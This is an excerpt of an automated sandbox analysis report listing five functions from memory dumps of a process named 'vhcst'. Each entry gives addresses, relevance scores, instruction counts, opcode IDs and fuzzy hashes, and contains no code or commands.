                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 88aabca92f00795ea87ced050c5c21fd3e50e6b437836fd744c135ec3d4896a3
                                                                                      • Instruction ID: 2033fbfd5c550b54b919894e457df0e78437065d917f28e6ee3e9ac3b74abafc
                                                                                      • Opcode Fuzzy Hash: 88aabca92f00795ea87ced050c5c21fd3e50e6b437836fd744c135ec3d4896a3
                                                                                      • Instruction Fuzzy Hash: 0131C511A0E3C2ABE7027BB8E8754E67FA09F4321C71D81F2D0EC894ABED086455C786
                                                                                      Function 00007FFD99FE5FF2 Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a204c7a8d545bf242ab2c97cd7b0cfd0e21480909c6dd84619e7a955e0bfeeb
                                                                                      • Instruction ID: 489e1f0a2dd88ae9f1a1d28ddf3463bd682ee3247fe38ccfe4e4319293ee720d
                                                                                      • Opcode Fuzzy Hash: 0a204c7a8d545bf242ab2c97cd7b0cfd0e21480909c6dd84619e7a955e0bfeeb
                                                                                      • Instruction Fuzzy Hash: A8314526E0C76297D3807EB8B8665D67790AF8132C71EC27BD0DC8C0FFAD15619686C6
                                                                                      Function 00007FFD99FE2CD8 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: badede374c8ff3046d20db57e751792cfbb7e1df3bbbca4d35319ac4a6b8a70d
                                                                                      • Instruction ID: cbadeec936afc237a091a0581a24826d52aff30017623ea667ba133545c38e21
                                                                                      • Opcode Fuzzy Hash: badede374c8ff3046d20db57e751792cfbb7e1df3bbbca4d35319ac4a6b8a70d
                                                                                      • Instruction Fuzzy Hash: DE31A401E0E3C26BE712ABB8D8755E67FA0AF4221C71D51F3D0D8890E7ED086415C786
                                                                                      Function 00007FFD99E106F0 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-1006404795
                                                                                      • Opcode ID: 1dacce1fecedf7459409cf3aa7db0d189749fdf7bf7ba521f96485ef00e31935
                                                                                      • Instruction ID: 40f563341b591dbcadfafbdf4926a7d0971ab34e3c2b815f412ad1164ab1c079
                                                                                      • Opcode Fuzzy Hash: 1dacce1fecedf7459409cf3aa7db0d189749fdf7bf7ba521f96485ef00e31935
                                                                                      • Instruction Fuzzy Hash: F0418057B0F1841FE3226EA86CB10E82F90DF8122D71C41F7D0DC8B29BE819994583C6
                                                                                      Function 00007FFD99E10708 Relevance: 6.3, Strings: 5, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-719319668
                                                                                      • Opcode ID: 6137db058b9d6ba7d84af6f6679a80bf849a468b05834b4141443ec661631711
                                                                                      • Instruction ID: b72bb1a2cce33e210fdf65080638f5ef1885f54472cfe44384c2b5dae3a4807e
                                                                                      • Opcode Fuzzy Hash: 6137db058b9d6ba7d84af6f6679a80bf849a468b05834b4141443ec661631711
                                                                                      • Instruction Fuzzy Hash: 57210873A0E1985FE3137EB86CA50E93F909F4122D71D41FBD09D8B2A7D818549A8786